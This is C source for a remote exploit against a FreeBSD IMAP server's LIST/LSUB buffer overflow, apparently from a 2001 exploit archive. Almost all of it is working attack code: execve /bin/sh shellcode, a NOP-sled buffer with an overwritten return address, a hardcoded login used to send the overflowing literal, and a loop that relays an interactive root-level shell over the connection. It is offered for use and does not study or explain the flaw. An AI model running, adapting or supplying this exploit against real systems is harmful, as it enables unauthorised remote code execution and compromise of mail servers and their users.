// // imapd sploit // [ list/lsub vulnerability ] // // eggcode: // freebsd // // default valuez for target: // freebsd4.0-rel + imap4rev1 2000.278 // // coder: // p0kem0n / kidz team // email: // // // comments: // i am a lazy shit. so there isn't userfriendly // command line i-face. // // p.s.: no errors checking // // greetz to: // all active members of [kidz team], dummYcube, mazz // #include #include #include #include #include #define IMAP_PORT 143 #define FAT 512 #define BUF_SIZE 1024 #define LBUF 512 //#define DEBUG #define LOGIN "uza" // don't forget to modify #define PASSWORD "lapassworde" char alien_egg[] = // idea of anathema. respect. "\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80\x66\x31\xc0\xcd\x80"; unsigned long body_addr = 0xbfbfeb68; // calibrate it for non default //0xbfbfea4c - preauth mode void alien_makeup(char* carrier, char* egg); int arrive(char* hosty, int port); int infect(int body, char* carrier); void alien_work(int body); int main(int argc, char** argv) { char carrier[4*LBUF]; int payback; int body; printf(" [ %-11s ][ starting.... ]\n", argv[0]); if(argc != 2) { printf("\t\t[ error in parameterz! ]\n"); printf("\t\t[ you must specify host ]\n"); exit(1); } alien_makeup(carrier, alien_egg); printf("\t\t[ alien maked ]\n"); printf("\t\t[ connect to %.32s.... ]\n", argv[1]); body = arrive(argv[1], IMAP_PORT); if(body < 0) { printf("\t\t\t[ failed! ]\n"); exit(1); } printf("\t\t\t[ successful ]\n"); if((payback = infect(body, carrier)) < 0) { printf("\t\t[ error sending carrier ]\n\t\t\t[ "); switch(payback) { case -1: printf(" possibly connection error ]\n"); break; case -2: printf(" kid, there isn't such a bug! ]\n"); break; case -3: printf(" get correct password first! ]\n"); } exit(1); } printf("\t\t[ INFECTED! ]\n"); printf("\t\t[ alien at work ]\n"); printf("\t\t\t[ begin ]\n"); alien_work(body); printf("\t\t\t[ alien iz dead ]\n"); printf("\t\t[ end ]\n"); printf(" [ %-11s ][ session is over ]\n", argv[0]); } void alien_makeup(char* carrier, char* egg) { memset(carrier, 0x90, 4*LBUF); strncpy(carrier+FAT, egg, strlen(egg)); *(unsigned long*)(carrier+BUF_SIZE+4) = body_addr+FAT; *(unsigned long*)(carrier+BUF_SIZE+8) = 0x00000a0a; #ifdef DEBUG printf(" [debug][ carrier: %s ]\n", carrier); printf("\t[ carriersize: %hx ]\n", strlen(carrier)); printf("\t[ eggsize: %hx ]\n", strlen(egg)); printf("\t[ alien_addr: 0x%x ]\n", *(unsigned long*)(carrier+BUF_SIZE+4)); #endif } int arrive(char* hosty, int port) { struct sockaddr_in way; struct hostent *hp, *gethostbyaddr(); int sock = socket(AF_INET, SOCK_STREAM, 0); if(sock < 0) return -1; way.sin_port = htons(port); way.sin_family = AF_INET; hp = gethostbyname(hosty); if(hp == NULL) { close(sock); return -1; } memcpy( &way.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length); if(connect(sock, (struct sockaddr*)&way, sizeof(way)) < 0) { close(sock); return -1; } return sock; } int infect(int body, char* carrier) { int len; char buf[LBUF]; memset(buf, 0, LBUF); if(recv(body, buf, LBUF, 0) < 0) { close(body); return -1; } #ifdef DEBUG printf(" // %s", buf); #endif sprintf(buf, "dead login "LOGIN" "PASSWORD"\n"); len = strlen(buf); if(send(body, buf, len, 0) < len) { close(body); return -1; } memset(buf, 0, LBUF); if(recv(body, buf, LBUF, 0) < 0) { close(body); return -1; } #ifdef DEBUG printf(" // %s", buf); #endif if(strncmp(buf+5, "OK", 2) != 0) { close(body); return -3; } buf[0] = '\0'; sprintf(buf, "dead list \"\" {%d}\n", BUF_SIZE+8); len = strlen(buf); if(send(body, buf, len, 0) < len) { close(body); return -1; } len = strlen(carrier); if(send(body, carrier, len, 0) < len) { close(body); return -1; } memset(buf, 0, LBUF); if(recv(body, buf, LBUF, 0) < 0) { close(body); return -1; } #ifdef DEBUG printf(" // %s", buf); #endif if((strncmp(buf+5, "BAD", 3) == 0)||(strncmp(buf+5, "OK", 2) == 0)) { close(body); return -2; } return 1; } void alien_work(int body) { int len; char buf[LBUF]; fd_set fds; while (1) { FD_SET(0, &fds); FD_SET(body, &fds); select(body+1, &fds, NULL, NULL, NULL); if (FD_ISSET(0, &fds)) { len = read (0, buf, LBUF); if (len <= 0) return; write (body, buf, len); } if (FD_ISSET(body, &fds)) { len = read (body, buf, LBUF); if (len <= 0) return; write(1, buf, len); } } } /* www.hack.co.za [14 April 2001]*/